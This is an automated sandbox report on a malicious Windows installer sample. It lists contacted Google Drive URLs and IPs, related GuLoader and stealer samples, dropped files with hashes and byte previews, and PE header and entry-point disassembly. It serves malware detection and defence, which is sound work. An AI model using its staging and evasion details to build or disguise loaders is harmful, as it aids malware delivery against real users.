00000008.00000002.3144397489.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2908504288.000000000711E000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1624372148.0000000007115000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2598985924.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2726603707.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2099822915.00000000070CC000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1780419041.00000000070CC000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2282761181.0000000007123000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3035505872.000000000711E000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2436407199.0000000007122000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://drive.google.com/ | ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2282761181.00000000070F5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://drive.google.com/ids.com | ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3063124661.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2256232847.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2908504288.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2255968173.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2726603707.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144276351.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2881422435.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3035369443.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2409610754.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2754804680.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2598985924.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2436273091.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2099903661.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2283011748.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2099822915.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2562778198.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2282761181.00000000070F5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://drive.google.com/ertificates | ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1940532305.00000000070A9000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1967489354.00000000070A9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://drive.google.com/ificate | ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1940532305.00000000070A9000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1967489354.00000000070A9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://drive.google.com/dz | ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144076442.0000000007058000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.181.1 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
172.217.19.174 | drive.google.com | United States | 15169 | GOOGLEUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1576273
Start date and time: 2024-12-16 18:04:12 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 42s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: ME-SPC-94.03.60.175.07.exe
Detection: MAL
Classification: mal68.troj.evad.winEXE@3/10@2/2
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 83%
• Number of executed functions: 48
• Number of non-executed functions: 76
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.12.23.50
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target ME-SPC-94.03.60.175.07.exe, PID 5064 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: ME-SPC-94.03.60.175.07.exe
                              No simulations
                              No context
Match: 37f463bf4616ecd445d4a1937da06e19 (the same match applies to every row below)
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
09-FD-94.03.60.175.07.xlsx.exe | Get hash | malicious | GuLoader | Browse | 142.250.181.1, 172.217.19.174
TEC-SPC-94.03.60.175.07.exe | Get hash | malicious | GuLoader | Browse | 142.250.181.1, 172.217.19.174
pedido-035241.exe | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | 142.250.181.1, 172.217.19.174
dZKPE9gotO.exe | Get hash | malicious | Vidar | Browse | 142.250.181.1, 172.217.19.174
InvoiceNr274728.pdf.lnk | Get hash | malicious | LummaC | Browse | 142.250.181.1, 172.217.19.174
nB52P46OJD.exe | Get hash | malicious | Vidar | Browse | 142.250.181.1, 172.217.19.174
file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | Browse | 142.250.181.1, 172.217.19.174
PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe | Get hash | malicious | GuLoader | Browse | 142.250.181.1, 172.217.19.174
njrtdhadawt.exe | Get hash | malicious | Stealc, Vidar | Browse | 142.250.181.1, 172.217.19.174
Match: C:\Users\user\AppData\Local\Temp\nsh56A9.tmp\System.dll (the same match applies to every row below; no Context values)
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link
09-FD-94.03.60.175.07.xlsx.exe | Get hash | malicious | GuLoader | Browse
TEC-SPC-94.03.60.175.07.exe | Get hash | malicious | GuLoader | Browse
Purchase-Order27112024.scr.exe | Get hash | malicious | Remcos, GuLoader | Browse
563299efce875400a8d9b44b96597c8e-sample (1).zip | Get hash | malicious | Unknown | Browse
debit-note-19-08-dn-2024.exe | Get hash | malicious | GuLoader | Browse
debit-note-19-08-dn-2024.exe | Get hash | malicious | GuLoader | Browse
HE9306_AWBLaser_Single240812144358.exe | Get hash | malicious | GuLoader | Browse
HE9306_AWBLaser_Single240812144358.exe | Get hash | malicious | GuLoader | Browse
z41_EX24-772_24.exe | Get hash | malicious | GuLoader | Browse
                                                Process:C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:modified
                                                Size (bytes):45
                                                Entropy (8bit):4.7748605961854445
                                                Encrypted:false
                                                SSDEEP:3:FR3tWAAQLQIfLBJXlFGfv:/ktQkIPeH
                                                MD5:8B9FC0443D7E48145E2D4B37AFB2D37B
                                                SHA1:64A5718A478A38AC262D2E46DA81D0E88C122A0F
                                                SHA-256:4F743978EAD44260F895C983689D718E31CA826161C447D205021A9D3E010AFA
                                                SHA-512:5126DA1D29F662465241C8B51B95783DF3F88C8FEB8BB1B65DCF354738C48AAB4BFB6C0035DFE6B40FA03AE5AABA8F72F1C31343AEC7D4EDB9C6EBCC773CC3D3
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:[ReBoot]..Ac=user32::EnumWindows(i r2 ,i 0)..
                                                Process:C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):11776
                                                Entropy (8bit):5.656006343879828
                                                Encrypted:false
                                                SSDEEP:192:eP24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35OlbSl:T8QIl975eXqlWBrz7YLOlb
                                                MD5:3E6BF00B3AC976122F982AE2AADB1C51
                                                SHA1:CAAB188F7FDC84D3FDCB2922EDEEB5ED576BD31D
                                                SHA-256:4FF9B2678D698677C5D9732678F9CF53F17290E09D053691AAC4CC6E6F595CBE
                                                SHA-512:1286F05E6A7E6B691F6E479638E7179897598E171B52EB3A3DC0E830415251069D29416B6D1FFC6D7DCE8DA5625E1479BE06DB9B7179E7776659C5C1AD6AA706
                                                Malicious:false
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                Joe Sandbox View:
                                                • Filename: 09-FD-94.03.60.175.07.xlsx.exe, Detection: malicious, Browse
                                                • Filename: TEC-SPC-94.03.60.175.07.exe, Detection: malicious, Browse
                                                • Filename: Purchase-Order27112024.scr.exe, Detection: malicious, Browse
                                                • Filename: 563299efce875400a8d9b44b96597c8e-sample (1).zip, Detection: malicious, Browse
                                                • Filename: debit-note-19-08-dn-2024.exe, Detection: malicious, Browse
                                                • Filename: debit-note-19-08-dn-2024.exe, Detection: malicious, Browse
                                                • Filename: HE9306_AWBLaser_Single240812144358.exe, Detection: malicious, Browse
                                                • Filename: HE9306_AWBLaser_Single240812144358.exe, Detection: malicious, Browse
                                                • Filename: z41_EX24-772_24.exe, Detection: malicious, Browse
                                                Reputation:moderate, very likely benign file
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L....n3T...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1171371
                                                Entropy (8bit):3.2073810382172203
                                                Encrypted:false
                                                SSDEEP:12288:TP7XiL27/OufaAr9hVgqWYVQmutk+DTPh:DbiLW/baCQZYV7uaATPh
                                                MD5:6D8E775E1417BA2913567DFC3F9BA77B
                                                SHA1:DC74B39D0D03105F2F074FD7AD98A5AD3C66929E
                                                SHA-256:2AB23F4D0227BA41DE2F194875D45769AF0E1FACA66217761C9AA625BDC5F4F2
                                                SHA-512:673AF93CD2F18CC4E27597770C3BB2302AD088158F4F774DAD4F5E5E2A01D3A4DA9D15A3AF43B5DE9C8F78C8EED0FEC37DC7B5038929FBC596F175B9C5FF6813
                                                Malicious:false
                                                Reputation:low
                                                Preview:. ......,...................\...........J........ ..........................................................................................................................................................................................................................................G...J...............j...........................................................................................................................................3.......h...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):28
                                                Entropy (8bit):4.110577243331642
                                                Encrypted:false
                                                SSDEEP:3:iGAeTUHvn:lAeTUHv
                                                MD5:F6A80CF0B011E1638B38D8EAA2A9629B
                                                SHA1:30AB7FEEC5D0A304ED9908ADD562601E3E7118C3
                                                SHA-256:AB3B162F39F8FDBD8DD767791EC116E75DA198FCE6BABBA6E1677044678714D8
                                                SHA-512:E1EC33696EA5086DEA0A52B577442B96124B71CD09999637185D114B7E5F313D455560C350F5A02FBA83C5A3A12A5234EEC995D0AF0CBF64471B3887E2AA2ED8
                                                Malicious:false
                                                Reputation:low
                                                Preview:[Access]..Setting=Disabled..
                                                Process:C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):26229
                                                Entropy (8bit):4.565944827284422
                                                Encrypted:false
                                                SSDEEP:384:93fjiECevfwGAtCWJKOOJIhG/Ozblh/bybWIIEwNfFBLsXoEnFkip2qxzBQxfMOz:9vmEbVAtHJKOaEeO2iIsNfrlynDCUG3
                                                MD5:9B16A31FF7B612839FA33F417EA765A6
                                                SHA1:963DB121A2B4C783667033D444EDAFA80643A795
                                                SHA-256:FF6DEF9EA03C332719BECED7941FA953A0CD9A9256DC5D59406967C04A4E682F
                                                SHA-512:62FAFFEBD3AE1E93E4F3594AA5C2C2CF92C627D31454EAE969E04FA605FEC8AD31BBC4A4678AE5E7E7DE9E84F89119BF19477FEF1B564EE448036CCAF9FFD64D
                                                Malicious:false
                                                Preview:...........=..........C...............00.||........SS......,.yyyy...........O..................i............@@........................gg...............hh.....#......::.MMMM.........]..,,.........K..##..**......U...nn.....'.kk.9.......................www.<<<.T................L.?...k...>>..1........^.........j.............KKK..P.....#.........OO.aa.KK.........YYYYYY..c..X...............r....<<..b..@.....m.......^........++.......999.9...xx........;;............].................{.g....GGG.::..G....................9....z......\..(....ttt....).........-----....x.44.............WW............}......HHHH.................TT.l.SS..Y...........(((((..uu......VVVVV..9........-......................Y..Y...................l.....^.....................o..[.........J....................F...........................gg.....{.....>..................%..............NNNNN.......BBBBBBBBB.....!....... .."...p.).................=.SSSS.................G................FF..{.....++++...3........JJ..............
                                                Process:C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):207998
                                                Entropy (8bit):1.2479248406208852
                                                Encrypted:false
                                                SSDEEP:768:tCENokMNjB1phztRILF3znwMWQZeRdtDL7xIC8GI82e/2awZ6aXmpeNhLvkoVtOX:e03p6cf0/e9ReE8H
                                                MD5:5C283F56F45AD89C5D82538EA09AC0F5
                                                SHA1:FA3736CF43F5841B9D4E28FF2024C17897EEF745
                                                SHA-256:D53EE062B5FA4EB7DED4A658B37B70DD6E90A581AF5BDE713169971AE249F605
                                                SHA-512:2B2516707050C5DFB7A8D9E151DEE98EDD44B59B08E0F19D301F80BFDE89129F47EC6079AC1E26F6D8C60AAFE2931A4D2BC720BEDD8149477810B0C8F558AD0A
                                                Malicious:false
                                                Preview:..(.................>............................................................................................................8....dq......................`..-..............................................g..........s...............................................................................................................................b...RE.b.........................................................................w..........................................................................................%............................P..........]...............:.........B..........................................4.......................................................................n...............................................................o................4..................y...9........#......................m.....z...........................................................K.....D..............m...........................>...................?.....................k.....
                                                Process:C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):264581
                                                Entropy (8bit):7.555057521954099
                                                Encrypted:false
                                                SSDEEP:6144:nJPaL2n7c2OXefawhWWWALf5VgS6yj7ylLYVq6vDj+mBUtu:JiL27/OufaAr9hVgqWYVQmutu
                                                MD5:BD4C8B17F76F44CA7A5F7AECB04DCA2A
                                                SHA1:AE1CA4155EC65CECA9EC5563179435809EBF5C14
                                                SHA-256:C27579D13768E93402220A2A7F31AF382B0B6053F35B61F71D8EE7AEAAAF6FAA
                                                SHA-512:54DF5A7BD7CA198586BED131DFFE7EBB5520EDD0D223DBC4CA923172B0FA11A8F41F76FDDFF301E0D8C00AAACD197D8088C8919C351559D47AD884F45DABCC91
                                                Malicious:false
                                                Preview:..mm....UU...........a.....R.....Q.....nnn.........((..77.................u.....==......".............A.t....Y...................$.......B.a..:.!...BB...A.....SS.......................................................................AA.D...*.?....C......*........E.....RR.......BB.....eee..^^^..=......2............s...%%........g......../.............;;;;.....y.........ff..................................vvvvv.e...........................ZZZ..77............//.....::::..u.%.....,..................;.................=...................-...A.s..............L.......8.(((........ee.........eee..p.N..........l.A..........%%%%%%%.................................w.........].....................................................qqqq...$$....NN..O..}.............WW..+............$$$$..33........y...&.,..........]....tt...%%.|..............r.LLL........................?.....r.HHHH...............................<..WWW..................7777......e..........bbbbbbbb.rr...............Q.....=.............
                                                Process:C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):443489
                                                Entropy (8bit):1.2463028275519636
                                                Encrypted:false
                                                SSDEEP:768:0B5HMEmj1BG+VGKVbkxUNjTj4Yl+ieTSrPb/1aKigAurLC2DVyTaL7B8IHBxCoxa:0kFoC4xKmYKV1tmGJJt0a+sWH0
                                                MD5:913964ACDFFFA24344A401D48E08C653
                                                SHA1:EE1E0AC79DA12D6439F9DF5B865347647473642A
                                                SHA-256:B3A4E2499F6A793497BAB8F5B6CC38462FD70F955308596ACFFF03D11F2F6ED4
                                                SHA-512:2AEBEB7DFFACF4150CCF6ED91EF5501B129331E5A2A4A465FC542562C52907FDA3990F7BE5F17B60854DE7FD34E6E2E873ED8C0DE6788964894890F69A9F261C
                                                Malicious:false
                                                Preview:..9............................................................2...................A.....................................................7...........................................................................g.......m..........................v.z.........9.........................K....................................................................................%...................:....................................................h...(... ..........]......]...........................-......................................................f......2.................d..........C...........................9.........._.....................L.......................................v..........................J...................\....................|........................&......'....N.....................................o............................8.....................................................................................................n...................................
                                                Process:C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):209062
                                                Entropy (8bit):1.2469617066336303
                                                Encrypted:false
                                                SSDEEP:768:aq+yDnL4aSptsfjJcMBkQnTum3yc5rUGLJTLAP6zp2R5O73XKymSRQoWgqVB7L+v:T7c811jBM9Y1qeu30oHw
                                                MD5:607886D87859E45164D2959809AB5367
                                                SHA1:4E86EB72512D4C9BE32304E3A12B499D6A86084B
                                                SHA-256:A05695DF251298ED2F35E2DFA2C4CF44D5BACCC391615FACD34FA6411BB43217
                                                SHA-512:A767C56234A265E17FE3D05A1218D628419E3B750E7D55DD5E2D57A847DBF7B72E10270A1D9D14D39D62BCEF38818DE54168AF87C2DE59FDBF503F0C382DA5DE
                                                Malicious:false
                                                Preview:...............................................i........A........5............................b.t....!......................J.........................&................../Z.........................................................|........................T......^.................8...................D...............:..q......g.......................................................{........................p.................................................|..............B......`..............................0...............................o.......................N.......................f........................p............^.............................................................................+..A......................k........@...........................()......g..................U...................d.......................f...............].LF...................................................................}.._............................8......................................7..
                                                Process:C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                Category:dropped
                                                Size (bytes):934
                                                Entropy (8bit):3.5288012779720437
                                                Encrypted:false
                                                SSDEEP:12:8wl0c0a/ledp8wXuQUlbq/JMRPbdpYmHbqjMRKqkXg1MJsW+slmY3D41QlzJCN8z:8QudO/9Q6jd9a6Kqoy3gDXr24qy
                                                MD5:33F17BE758F9EB48607998AD159B8BE3
                                                SHA1:E447A7848FE670B40CF1449519BB25EDAFE70B60
                                                SHA-256:B1E0BA2EBAB497498C953A9A9DB536D93F749D00E18E13496B6C64888AE3DEE9
                                                SHA-512:4233B806B94F3E564BF25845FA0B13D59354DB4733A33E0F3FEAD0006B5976C9E5F54D7DD4214A07014DE89DAEF43CD6C35E542AA07560C60672737EC3E4FFCB
                                                Malicious:false
                                                Preview:L..................F........................................................q....P.O. .:i.....+00.../C:\...................z.1...........Program Files (x86).X............................................P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...".f.1...........Common Files..J............................................C.o.m.m.o.n. .F.i.l.e.s.....b.2...........cutline.sil.H............................................c.u.t.l.i.n.e...s.i.l.......2.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.o.m.m.o.n. .F.i.l.e.s.\.c.u.t.l.i.n.e...s.i.l.[.C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.T.e.m.p.l.a.t.e.s.\.t.y.p.h.l.o.s.t.o.m.y.\.E.n.e.f.o.r.h.a.n.d.l.e.r.2.3.1.........,...............$M....>M...EQ ..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Entropy (8bit):7.877544210961208
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:ME-SPC-94.03.60.175.07.exe
                                                File size:511'843 bytes
                                                MD5:23f5026ef6b69b601f982f0498e02ddb
                                                SHA1:4fd5aa90b343ca1061992256ae2de8498bc64575
                                                SHA256:be145da99fd91764709334306a81e69f35a06684c37f00249cd170d1f29c12f0
                                                SHA512:2a5fdef8af3351eb4f4609623971649f46765142f213feab63029f882b00240872540074326bd8726cf9f9dc8f8455cd8c08d03f8a9a252d34c7f1799eb120ca
                                                SSDEEP:12288:XRV78GUAkJJOflxy9n8BH0K12WoXbTSuR:IGtmGK+00oXy6
                                                TLSH:09B4124076C1DE5AC6BF89314DF2C7B5957AEC012C71524B2E223F777978382886AB87
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....n3T.................`...*......Z3.......p....@
                                                Icon Hash:0714262e34390f06
                                                Entrypoint:0x40335a
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x54336EB4 [Tue Oct 7 04:40:20 2014 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:e221f4f7d36469d53810a4b5f9fc8966
                                                Instruction
                                                sub esp, 000002D8h
                                                push ebx
                                                push ebp
                                                push esi
                                                push edi
                                                push 00000020h
                                                xor ebp, ebp
                                                pop esi
                                                mov dword ptr [esp+18h], ebp
                                                mov dword ptr [esp+10h], 00409230h
                                                mov dword ptr [esp+14h], ebp
                                                call dword ptr [00407034h]
                                                push 00008001h
                                                call dword ptr [004070BCh]
                                                push ebp
                                                call dword ptr [004072ACh]
                                                push 00000009h
                                                mov dword ptr [004292B8h], eax
                                                call 00007F4F44C22CDAh
                                                mov dword ptr [00429204h], eax
                                                push ebp
                                                lea eax, dword ptr [esp+38h]
                                                push 000002B4h
                                                push eax
                                                push ebp
                                                push 004206A8h
                                                call dword ptr [0040717Ch]
                                                push 0040937Ch
                                                push 00428200h
                                                call 00007F4F44C22945h
                                                call dword ptr [00407134h]
                                                mov ebx, 00434000h
                                                push eax
                                                push ebx
                                                call 00007F4F44C22933h
                                                push ebp
                                                call dword ptr [0040710Ch]
                                                push 00000022h
                                                mov dword ptr [00429200h], eax
                                                pop edi
                                                mov eax, ebx
                                                cmp word ptr [00434000h], di
                                                jne 00007F4F44C1FDC9h
                                                mov esi, edi
                                                mov eax, 00434002h
                                                push esi
                                                push eax
                                                call 00007F4F44C22383h
                                                push eax
                                                call dword ptr [00407240h]
                                                mov ecx, eax
                                                mov dword ptr [esp+1Ch], ecx
                                                jmp 00007F4F44C1FEBBh
                                                push 00000020h
                                                pop edx
                                                cmp ax, dx
                                                jne 00007F4F44C1FDC9h
                                                inc ecx
                                                inc ecx
                                                cmp word ptr [ecx], dx
                                                Programming Language:
                                                • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7494 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4a000 | 0x132d8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x2b8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5ec6 | 0x6000 | 60ec0c4d80dd6821cdaced6135eddfd5 | False | 0.6593424479166666 | data | 6.438901783265187 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x1354 | 0x1400 | 2222fe44ebbadbc32af32dfc9c88e48e | False | 0.4306640625 | data | 5.037511188789184 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x202f8 | 0x600 | 99cdd6cde9adee6bf3b24ee817b4574b | False | 0.4830729166666667 | data | 3.8340327961758165 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x2a000 | 0x20000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x4a000 | 0x132d8 | 0x13400 | 6a5bbc33287fc34c026c3652aab40ca4 | False | 0.7685800527597403 | data | 6.977243320980138 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x4a448 | 0xb1b3 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9923501351915763
RT_ICON | 0x55600 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.4311203319502075
RT_ICON | 0x57ba8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.48053470919324576
RT_ICON | 0x58c50 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.5330490405117271
RT_ICON | 0x59af8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.5647540983606557
RT_ICON | 0x5a480 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.6353790613718412
RT_ICON | 0x5ad28 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States | 0.5961981566820277
RT_ICON | 0x5b3f0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.3176829268292683
RT_ICON | 0x5ba58 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.42124277456647397
